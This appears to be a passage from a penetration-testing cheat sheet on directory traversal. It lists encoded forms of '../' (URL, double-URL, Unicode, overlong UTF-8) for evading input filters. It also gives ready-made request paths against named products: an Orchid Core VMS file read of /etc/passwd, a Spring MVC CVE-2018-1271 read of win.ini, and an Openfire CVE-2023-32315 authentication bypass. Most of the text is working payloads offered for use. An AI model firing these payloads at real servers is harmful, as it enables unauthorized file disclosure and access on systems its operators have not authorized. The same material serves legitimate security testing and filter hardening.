Methodology
We can use the .. characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
URL Encoding
| Character | Encoded |
|---|---|
. |
%2e |
/ |
%2f |
\ |
%5c |
Example: IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion
{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd
Double URL Encoding
Double URL encoding is the process of applying URL encoding twice to a string. In URL encoding, special characters are replaced with a % followed by their hexadecimal ASCII value. Double encoding repeats this process on the already encoded string.
| Character | Encoded |
|---|---|
. |
%252e |
/ |
%252f |
\ |
%255c |
Example: Spring MVC Directory Traversal Vulnerability (CVE-2018-1271)
{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
Unicode Encoding
| Character | Encoded |
|---|---|
. |
%u002e |
/ |
%u2215 |
\ |
%u2216 |
Example: Openfire Administration Console - Authentication Bypass (CVE-2023-32315)
{{BaseURL}}/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp
Overlong UTF-8 Unicode Encoding
The UTF-8 standard mandates that each codepoint is encoded using the minimum number of bytes necessary to represent its significant bits. Any encoding that uses more bytes than required is referred to as "overlong" and is considered invalid under the UTF-8 specification. This rule ensures a one-to-one mapping between codepoints and their valid encodings, guaranteeing that each codepoint has a single, unique representation.
| Character | Encoded |
|---|---|
. |
%c0%2e, %e0%40%ae, %c0%ae |
/ |
%c0%af, %e0%80%af, %c0%2f |
\ |
%c0%5c, %c0%80%5c |